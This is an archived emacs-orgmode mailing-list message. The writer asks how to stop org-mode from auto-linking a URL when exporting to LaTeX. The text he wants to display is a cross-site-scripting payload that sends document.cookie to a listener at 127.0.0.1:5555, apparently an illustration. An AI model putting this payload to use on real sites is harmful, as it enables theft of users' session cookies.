all messages for Emacs-related lists mirrored at yhetil.org
 help / color / mirror / code / Atom feed
* Reg: html tags inside orgmode
@ 2012-02-29  8:44 Bodhi
  0 siblings, 0 replies; only message in thread
From: Bodhi @ 2012-02-29  8:44 UTC (permalink / raw)
  To: emacs-orgmode

[-- Attachment #1: Type: text/plain, Size: 556 bytes --]

Hi,
I am trying to write something like this in org, which I wish to publish to
LaTeX:

\texttt{<script>document.write(`<img src=http://127.0.0.1:5555?c=' +
escape(document.cookie) + `   >'); </script>}

But I am ending up with something like this:

\texttt{<script>document.write(`<img src=[[
http://127.0.0.1:5555?c%3D][http://127.0.0.1:5555?c=]]' +
escape(document.cookie) + `   >'); </script>}

How should I be able to display the http part without org automatically
turning it into a link?

Thanks in advance


-- 
Warm regards,
Bodhisatta Barman Roy

[-- Attachment #2: Type: text/html, Size: 797 bytes --]

^ permalink raw reply	[flat|nested] only message in thread

only message in thread, other threads:[~2012-02-29  8:45 UTC | newest]

Thread overview: (only message) (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2012-02-29  8:44 Reg: html tags inside orgmode Bodhi

Code repositories for project(s) associated with this external index

	https://git.savannah.gnu.org/cgit/emacs.git
	https://git.savannah.gnu.org/cgit/emacs/org-mode.git

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.